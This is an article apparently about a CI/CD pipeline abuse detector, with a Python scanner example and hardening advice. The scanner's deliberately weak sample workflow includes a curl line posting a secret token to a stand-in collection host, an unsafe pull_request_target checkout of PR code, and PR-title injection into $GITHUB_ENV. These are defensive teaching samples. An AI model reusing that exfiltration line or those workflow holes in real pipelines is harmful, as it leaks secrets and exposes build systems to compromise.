Mark0

CI/CD pipeline abuse: the problem no one is watching

The article introduces cicd-abuse-detector, an open-source tool for protecting CI/CD pipelines on GitHub Actions, GitLab CI, and Azure DevOps. It combines 50+ regex signals with LLM analysis (via Claude) to flag malicious patterns in workflow changes: credential exfiltration, abuse of privileged triggers, and environment injection. The underlying point is a shift in adversary tactics toward the automation layer that governs how software is built and deployed, rather than the software itself.

The research validates the detector against real-world campaigns and offensive toolkits such as Nord Stream and Gato-X. Beyond detection, the authors give hardening recommendations: pin actions to commit SHAs rather than mutable tags, scope secrets to the individual steps that need them, and set explicit workflow permissions instead of relying on the defaults. The goal is a queryable, cross-platform defense that integrates with Elasticsearch for long-term threat monitoring.
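As an added example (not code from the article or from cicd-abuse-detector), here is a small scanner of the kind the article describes: a handful of regex-style signals run over two constructed GitHub Actions workflows, one carrying the weaknesses listed above and one hardened per the recommendations (SHA-pinned actions, step-scoped secrets, explicit permissions). The signal names and patterns, both sample workflows, the placeholder commit SHA and the example.invalid URL are assumptions made for this example; the real tool's signal set is not reproduced here.

```python
"""Added example, not code from cicd-abuse-detector: a few regex signals of the
kind the article describes, run over two constructed GitHub Actions workflows.
Signal names, patterns and the sample workflows are this example's own."""
import re

# Single-line `run:` / `uses:` entries only; multi-line `run: |` blocks are out
# of scope for this small example.
SIGNALS = [
    # Untrusted PR/issue fields interpolated straight into a shell line
    # (injection into $GITHUB_ENV, $GITHUB_PATH or the shell itself).
    ("untrusted-input-in-run",
     re.compile(r"^\s*-?\s*run:.*\$\{\{\s*github\.(?:event\.|head_ref)", re.M)),
    # A secret handed to an outbound HTTP client on a run line.
    ("secret-in-http-call",
     re.compile(r"^\s*-?\s*run:.*\b(?:curl|wget)\b.*\$\{\{\s*secrets\.", re.M)),
]
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s@]+)@(\S+)", re.M)
SHA_RE = re.compile(r"^[0-9a-f]{40}$")
# Privileged trigger (mapping or flow-list form) plus checkout of the PR head:
# attacker-controlled code runs with the base repo's secrets.
PRT_RE = re.compile(r"^\s*pull_request_target\s*:|^\s*on:\s*\[[^\]]*\bpull_request_target\b", re.M)
PR_HEAD_RE = re.compile(r"ref:\s*\$\{\{\s*github\.event\.pull_request\.head\.(?:sha|ref)")


def secrets_outside_steps(workflow: str) -> list[int]:
    """Line numbers where `secrets.` is referenced outside any `steps:` block,
    i.e. at workflow or job level instead of scoped to a single step."""
    hits, steps_indent = [], None
    for lineno, line in enumerate(workflow.splitlines(), 1):
        body = line.lstrip()
        if not body or body.startswith("#"):
            continue
        indent = len(line) - len(body)
        if steps_indent is not None and indent <= steps_indent:
            steps_indent = None            # dedented: left the steps block
        if body.startswith("steps:"):
            steps_indent = indent
        elif "secrets." in body and steps_indent is None:
            hits.append(lineno)
    return hits


def scan(workflow: str) -> list[str]:
    """Return the sorted names of every signal that fires on a workflow file."""
    found = {name for name, pat in SIGNALS if pat.search(workflow)}
    if any(not SHA_RE.match(ref) for _, ref in USES_RE.findall(workflow)):
        found.add("unpinned-action")       # tag or branch ref, not a 40-hex SHA
    if re.search(r"^\s*permissions:", workflow, re.M) is None:
        found.add("no-explicit-permissions")
    if PRT_RE.search(workflow) and PR_HEAD_RE.search(workflow):
        found.add("privileged-trigger-runs-pr-code")
    if secrets_outside_steps(workflow):
        found.add("secret-not-step-scoped")
    return sorted(found)


# Constructed sample: every weakness the article's recommendations address.
WEAK_WORKFLOW = """\
name: pr-build
on:
  pull_request_target:
    types: [opened, synchronize]
env:
  NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: echo "PR_TITLE=${{ github.event.pull_request.title }}" >> $GITHUB_ENV
      - run: npm ci && npm test
      - run: curl -s -X POST -d "token=${{ secrets.NPM_TOKEN }}" https://example.invalid/collect
"""

# Constructed sample: same job, hardened. The SHA is a placeholder, not a real pin.
HARDENED_WORKFLOW = """\
name: pr-build
on:
  pull_request:
    types: [opened, synchronize]
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567 # placeholder SHA
      - name: Read PR title without shell interpolation
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: echo "PR_TITLE=$PR_TITLE" >> "$GITHUB_ENV"
      - run: npm ci && npm test
      - name: Publish
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
        run: npm publish
"""

if __name__ == "__main__":
    for label, wf in (("weak", WEAK_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(f"{label}: {scan(wf) or 'no findings'}")
```

The interesting design point is that the privileged-trigger signal only fires on the combination of `pull_request_target` and a checkout of the PR head; either alone is a legitimate pattern, which is why a tool like this layers regex signals and then reasons about their co-occurrence rather than alerting on each match in isolation.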
